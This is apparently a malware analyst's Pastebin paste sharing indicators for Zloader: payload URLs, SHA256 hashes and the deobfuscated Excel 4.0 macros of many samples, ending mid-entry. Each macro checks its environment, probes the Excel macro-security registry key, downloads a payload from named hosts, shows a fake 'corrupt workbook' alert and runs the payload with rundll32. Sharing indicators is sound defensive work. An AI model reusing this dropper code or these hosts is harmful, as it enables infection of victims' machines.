Advertisement
dissectmalware

Zloader - Deobfuscated Macro

Apr 8th, 2020
1,035
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 60.06 KB | None | 0 0
  1. URLS, count
  2. https://assemble.sg/wp-front.php 22
  3. https://cworld.top/wp-front.php 22
  4. https://efbzfyvsb.website/f2f23 8
  5. https://ddfspwxrb.club/fb2g424g 14
  6. http://fcowhcwsb.space/erg4ewr1 7
  7. https://greentec-automation.com/wp-cran.php 2
  8. https://narensyndicate.com/wp-cran.php 2
  9. https://greentec-automation.com/wp-crun.php 3
  10. https://narensyndicate.com/wp-crun.php 3
  11.  
  12. HASHES
  13. 0066bbdf73e28a97dbbb1026712267b56b598eac8a1513da2e8078ce33692e4c
  14. 00ad13fa3fd2b1fe626433aec598726ea494d83f7d185a51a721850cff97781a
  15. 00fa1019a11da3a4788a5f10eb8e29b966afee97da21ced72444ddfa417b7d1f
  16. 01171bdba169c60d2750ca824aa61394f0940bf1d566e762591de92caa5954de
  17. 078bdd70ccae34837c3a26979f6d23839935f7cf33e5d25b9cd27f75f8d0ac0c
  18. 07a418b28c713b60a4c0640f92ee837f841f93d72d8d54d47a6249ea5971ffea
  19. 07edb91717b7681e3a5001df0779c7d146323eebfafe5acfeb029ddc0de2d8f5
  20. 0c28aa2fc0695ffc2cae2410720177f376329e9586fe9cd024ba97e70d570407
  21. 0c32b2291d2f36330b24b1d4bc6d106e5dbd5d7f5b3d4aa43a2e49d9efb6d293
  22. 0c54264ff7824d4f6b0a5972d7d7c08e9ceda51a0a20920db40b672e3572a709
  23. 0c9e1e8fcf8197522f477408b9354e3e94145d653820e0070f81480cf3dece65
  24. 0e693b9796698ba3005ba24a3028354cf70a95fc7d34eb6745f04255e811b50c
  25. 0e6a4b49a500166adbf705048d48a7cbf387a74bcdce1c16d84082204242c7fb
  26. 0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b
  27. 0f483de59e086600051051c55d89e3f351f4fbbbc051cacf7481b4209a1d5e25
  28. 1266f2e2bc66b677295913ff5e9d6d80437af0f4609f02e0920564e775854c76
  29. 12f66f168341e3ef08e507ed7fed7a45d9430bfc6b57309bd803500be64ad07c
  30. 145217e66d1ebecad8f32ca5bc7509bdc54de95a7d78c920265ae83509dccb37
  31. 15275c0f7feb25bbd1c64d37ea7489849579bca9565239c82cbc6e74c09268fa
  32. 166e74a958e76ee50f889b092efa506e3b659bed1c3d82dfbcc95b90792a6746
  33. 170b4ddc50e479fc45194bf011b125de4883f8dc7dd40b8fa2d5515504abe20d
  34. 17c22e5fb4e7d9833ad3a3bb99d2dbceec35d65ca3df2f2f594447a6d43256cf
  35. 17f0df4bcdecef88fc634fee9ec560cd81e935b3bdab569ce58536039074da73
  36. 17f7fba52659e49bbcd788022bc079ed9a0028680c5ce9cb09b6ccc148cf7d9b
  37. 1a0e08248e3a6e053afc293482b48f1c2fe345cd863ed63cb279599ce8a099b8
  38. 1aecc59781e07fe93184cbea2dd82738ccd76045d6eda669329afa151aab0f17
  39. 1c3cadbdb6d9f6ddd42dac0e52a8f657e567b6e9edcd01bcce264fe46760aca5
  40. 1ecf507dc0a49cd73615cfc22cbc8ff62526b22de1168ce99f2657fe0dadb788
  41. 1f54709a54ae7300279115188cf9015dad5146e59b6306e69026dce75c74e115
  42. 1fad7907d00ac5c87fcb492de8273d41fbef51f8d8b1364f75e81a56577841ee
  43. 1ff80c5aeff03dc83112cddf2e807c281f09a09cdd1c53de68334ee04d97d987
  44. 22bb1293cfd109d0b8bd44d410f379deb8c4d02b095552b8954c6a75e5bc9ae9
  45. 2458eec040213f72bb3ac118c26cb49ceb7f3591d1a534e4533f1ddaf07b49a1
  46. 246688f7cf49c8641cca934340e61415a599d0f60d3db7db6e1d95334a760128
  47. 24940237fe63867d76bb6623119d9accf0154e3bb695eb39abb3db9d5dd1478f
  48. 249dc12dbaf933345e21e339ab247af3705205954cef78135486c50cd0da87a8
  49. 256bbe555af14dcfe138d8e6ee89bdc12b9e1b1174464697e939c62981876ff2
  50. 256fa7c39e92a9d5ca30cd499761986eebb5e4a76638000016a040addd1700b6
  51. 25821076bde5f4075b4d0d791dfa5e97942b918032b95a22449795e1ae44c0fa
  52. 25c3c44e3eb700bc26528cd5518d10f3c0ce9bbca42e558455f56b3c743a47bc
  53. 260a1586c3aeca77e50aa4d34e4b79a8d96e0df8079a6cabab94340b2db55c99
  54. 2672f0d5fea87c66056968b75cb7cbe1ab1385a3271742d4922bf3f2bf014a7c
  55. 2aa9e690895bd08efe0bc1ea961e03f99fd366ac488464c1c7925523172cfaee
  56. 2d14c9fcf22fbd93fca401026579176f511a7aa88bb9826e22ef75a37f89d45a
  57. 2e07ec0a7f2338357785a19d9c9a50aec122628b1168873556b8e36fcd368c16
  58. 2e0d33fc6ee66508b5e5c1e7886e498005a940fd10203e5c44606cf137060e91
  59. 2ee2221f65c537ed6e6c2ff760c010a68ae28bb6eb8e3133f263399a3e7626f2
  60. 2f287a26eab4d96d6be641b9b622c03dc24e1e500d6edc7f1d76d2ac7229b47d
  61. 31d22dc2d95d1581210f46c52d21d22b04f660cc210160cafd38abd9fea0cc63
  62. 341c8e54b1eb0d4d092825257143d28ebc8ab54587f650f5f4486494955bed7e
  63.  
  64. Deobfuscated Macro
  65. SHA256: 0066bbdf73e28a97dbbb1026712267b56b598eac8a1513da2e8078ce33692e4c
  66. GVUHe58Lrb
  67. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  68. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  69. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  70. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  71. =WAIT(NOW()+"00:00:03")
  72. =FOPEN("c:\users\public\1.reg")
  73. =FPOS(R[-1]C, 215)
  74. =FREAD(R[-2]C, 255)
  75. =FCLOSE(R[-3]C)
  76. =FILE.DELETE("c:\users\public\1.reg")
  77. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  78. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  79. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  80. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  81. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  82. =CLOSE(FALSE)
  83.  
  84. SHA256: 00ad13fa3fd2b1fe626433aec598726ea494d83f7d185a51a721850cff97781a
  85. 9Ir6OfjsAA
  86. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  87. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  88. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  89. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  90. =WAIT(NOW()+"00:00:03")
  91. =FOPEN("c:\users\public\1.reg")
  92. =FPOS(R[-1]C, 215)
  93. =FREAD(R[-2]C, 255)
  94. =FCLOSE(R[-3]C)
  95. =FILE.DELETE("c:\users\public\1.reg")
  96. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  97. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  98. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  99. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  100. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  101. =CLOSE(FALSE)
  102.  
  103. SHA256: 00fa1019a11da3a4788a5f10eb8e29b966afee97da21ced72444ddfa417b7d1f
  104. 6Jb792J4Iy
  105. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))A36A37A38A39A41A42
  106. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  107. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  108. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210
  109. =WAIT(NOW()+"00:00:03")
  110. =FOPEN("c:\users\public\1.reg")
  111. =FPOS(R[-1]C, 215)G20G21G22
  112. =FREAD(R[-2]C, 255)
  113. =FCLOSE(R[-I15]C)
  114. =FILE.DELETE("c:\users\public\1.reg")J39J41J42J43J44
  115. =IF(ISNUMBER(SEARCH("0001",R[-K37]C)),CLOSE(FALSE),)
  116. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)L132L133L134L135L137L138L139
  117. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M114
  118. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5)N149N150N151N152N153N154N155N156N157N158N159N160N161N162N163
  119. =CLOSE(FALSE)
  120.  
  121. SHA256: 01171bdba169c60d2750ca824aa61394f0940bf1d566e762591de92caa5954de
  122. STA7jVrNVR
  123. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  124. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  125. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  126. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  127. =WAIT(NOW()+"00:00:03")
  128. =FOPEN("c:\users\public\1.reg")
  129. =FPOS(R[-1]C, 215)
  130. =FREAD(R[-2]C, 255)
  131. =FCLOSE(R[-3]C)
  132. =FILE.DELETE("c:\users\public\1.reg")
  133. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  134. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
  135. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  136. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  137. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
  138. =CLOSE(FALSE)
  139.  
  140. SHA256: 078bdd70ccae34837c3a26979f6d23839935f7cf33e5d25b9cd27f75f8d0ac0c
  141. eiAbQ7mGrr
  142. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  143. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  144. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  145. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  146. =WAIT(NOW()+"00:00:03")
  147. =FOPEN("c:\users\public\1.reg")
  148. =FPOS(R[-1]C, 215)
  149. =FREAD(R[-2]C, 255)
  150. =FCLOSE(R[-3]C)
  151. =FILE.DELETE("c:\users\public\1.reg")
  152. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  153. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  154. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  155. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  156. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  157. =CLOSE(FALSE)
  158.  
  159. SHA256: 07a418b28c713b60a4c0640f92ee837f841f93d72d8d54d47a6249ea5971ffea
  160. uloa7Nu85w
  161. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  162. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  163. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  164. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  165. =WAIT(NOW()+"00:00:03")
  166. =FOPEN("c:\users\public\1.reg")
  167. =FPOS(R[-1]C, 215)
  168. =FREAD(R[-2]C, 255)
  169. =FCLOSE(R[-3]C)
  170. =FILE.DELETE("c:\users\public\1.reg")
  171. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  172. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
  173. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  174. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  175. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
  176. =CLOSE(FALSE)
  177.  
  178. SHA256: 07edb91717b7681e3a5001df0779c7d146323eebfafe5acfeb029ddc0de2d8f5
  179. rQWtLvQjQM
  180. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  181. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  182. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  183. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  184. =WAIT(NOW()+"00:00:03")
  185. =FOPEN("c:\users\public\1.reg")
  186. =FPOS(R[-1]C, 215)
  187. =FREAD(R[-2]C, 255)
  188. =FCLOSE(R[-3]C)
  189. =FILE.DELETE("c:\users\public\1.reg")
  190. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  191. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  192. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  193. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  194. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  195. =CLOSE(FALSE)
  196.  
  197. SHA256: 0c28aa2fc0695ffc2cae2410720177f376329e9586fe9cd024ba97e70d570407
  198. ZDMjCWf4D0
  199. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))A36A37A38A39A41A42
  200. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  201. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  202. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210
  203. =WAIT(NOW()+"00:00:03")
  204. =FOPEN("c:\users\public\1.reg")
  205. =FPOS(R[-1]C, 215)G20G21G22
  206. =FREAD(R[-2]C, 255)
  207. =FCLOSE(R[-I15]C)
  208. =FILE.DELETE("c:\users\public\1.reg")J39J41J42J43J44
  209. =IF(ISNUMBER(SEARCH("0001",R[-K37]C)),CLOSE(FALSE),)
  210. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)L132L133L134L135L137L138L139
  211. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M114
  212. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5)N149N150N151N152N153N154N155N156N157N158N159N160N161N162N163
  213. =CLOSE(FALSE)
  214.  
  215. SHA256: 0c32b2291d2f36330b24b1d4bc6d106e5dbd5d7f5b3d4aa43a2e49d9efb6d293
  216. HKH5hPQa8c
  217. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  218. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B38B39B40B42B43
  219. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  220. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  221. =WAIT(NOW()+"00:00:03")
  222. =FOPEN("c:\users\public\1.reg")
  223. =FPOS(R[-1]C, 215)
  224. =FREAD(R[-2]C, 255)H19H20H22H23
  225. =FCLOSE(R[-3]C)
  226. =FILE.DELETE("c:\users\public\1.reg")
  227. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)K54K55K56K57K58K60K61
  228. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://fcowhcwsb.space/erg4ewr1","c:\Users\Public\b7gf5ef.html",0,0)
  229. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M115
  230. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5ef.html,DllRegisterServer",0,5)N150N151N152N153N154N155N156N157N158N159N160N161N162N163N164
  231. =CLOSE(FALSE)
  232.  
  233. SHA256: 0c54264ff7824d4f6b0a5972d7d7c08e9ceda51a0a20920db40b672e3572a709
  234. 6JB9MusG5I
  235. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  236. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  237. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  238. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D184D185D186D187D188D189D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  239. =WAIT(NOW()+"00:00:03")
  240. =FOPEN("c:\users\public\1.reg")
  241. =FPOS(R[-1]C, 215)
  242. =FREAD(R[-2]C, 255)H21H22H24
  243. =FCLOSE(R[-3]C)
  244. =FILE.DELETE("c:\users\public\1.reg")
  245. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  246. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://greentec-automation.com/wp-cran.php","c:\Users\Public\cskc75ef.html",0,0)L124L125L126L127L129L130L131L132L133L134L136L137L138L139
  247. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://narensyndicate.com/wp-cran.php","c:\Users\Public\cskc7M1375ef.html",0,0),)
  248. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  249. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\cskc75ef.html,DllRegisterServer",0,5)O149O150O151O152O153O154O155O156O157O158O159O160O161O162O163O164
  250. =CLOSE(FALSE)
  251.  
  252. SHA256: 0c9e1e8fcf8197522f477408b9354e3e94145d653820e0070f81480cf3dece65
  253. aVt9vPOaFb
  254. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  255. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  256. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  257. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  258. =WAIT(NOW()+"00:00:03")
  259. =FOPEN("c:\users\public\1.reg")
  260. =FPOS(R[-1]C, 215)
  261. =FREAD(R[-2]C, 255)
  262. =FCLOSE(R[-3]C)
  263. =FILE.DELETE("c:\users\public\1.reg")
  264. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  265. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  266. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  267. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  268. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  269. =CLOSE(FALSE)
  270.  
  271. SHA256: 0e693b9796698ba3005ba24a3028354cf70a95fc7d34eb6745f04255e811b50c
  272. B49YHBxYYc
  273. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  274. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B38B39B40B42B43
  275. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  276. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  277. =WAIT(NOW()+"00:00:03")
  278. =FOPEN("c:\users\public\1.reg")
  279. =FPOS(R[-1]C, 215)
  280. =FREAD(R[-2]C, 255)H19H20H22H23
  281. =FCLOSE(R[-3]C)
  282. =FILE.DELETE("c:\users\public\1.reg")
  283. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)K54K55K56K57K58K60K61
  284. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://fcowhcwsb.space/erg4ewr1","c:\Users\Public\b7gf5ef.html",0,0)
  285. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M115
  286. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5ef.html,DllRegisterServer",0,5)N150N151N152N153N154N155N156N157N158N159N160N161N162N163N164
  287. =CLOSE(FALSE)
  288.  
  289. SHA256: 0e6a4b49a500166adbf705048d48a7cbf387a74bcdce1c16d84082204242c7fb
  290. k0nDyCvoly
  291. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  292. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  293. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  294. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  295. =WAIT(NOW()+"00:00:03")
  296. =FOPEN("c:\users\public\1.reg")
  297. =FPOS(R[-1]C, 215)
  298. =FREAD(R[-2]C, 255)
  299. =FCLOSE(R[-3]C)
  300. =FILE.DELETE("c:\users\public\1.reg")
  301. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  302. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  303. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  304. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  305. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  306. =CLOSE(FALSE)
  307.  
  308. SHA256: 0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b
  309. iRkMZY7iUa
  310. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  311. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B36B37B39B40B41B42B43
  312. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  313. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D184D185D186D187D188D189D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  314. =WAIT(NOW()+"00:00:03")
  315. =FOPEN("c:\users\public\1.reg")
  316. =FPOS(R[-1]C, 215)
  317. =FREAD(R[-2]C, 255)H21H22H24
  318. =FCLOSE(R[-3]C)
  319. =FILE.DELETE("c:\users\public\1.reg")
  320. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  321. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://greentec-automation.com/wp-crun.php","c:\Users\Public\csg75ef.html",0,0)L124L125L126L127L129L130L131L132L133L134L136L137L138L139
  322. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://narensyndicate.com/wp-crun.php","c:\Users\Public\bwep5ef.html",0,0),)
  323. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)N115
  324. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)O149O150O151O152O153O154O155O156O157O158O159O160O161O162O163O164
  325. =CLOSE(FALSE)
  326.  
  327. SHA256: 0f483de59e086600051051c55d89e3f351f4fbbbc051cacf7481b4209a1d5e25
  328. AN1nUXP6CF
  329. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  330. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  331. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  332. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  333. =WAIT(NOW()+"00:00:03")
  334. =FOPEN("c:\users\public\1.reg")
  335. =FPOS(R[-1]C, 215)
  336. =FREAD(R[-2]C, 255)
  337. =FCLOSE(R[-3]C)
  338. =FILE.DELETE("c:\users\public\1.reg")
  339. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  340. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  341. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  342. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  343. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  344. =CLOSE(FALSE)
  345.  
  346. SHA256: 1266f2e2bc66b677295913ff5e9d6d80437af0f4609f02e0920564e775854c76
  347. raazxanWOk
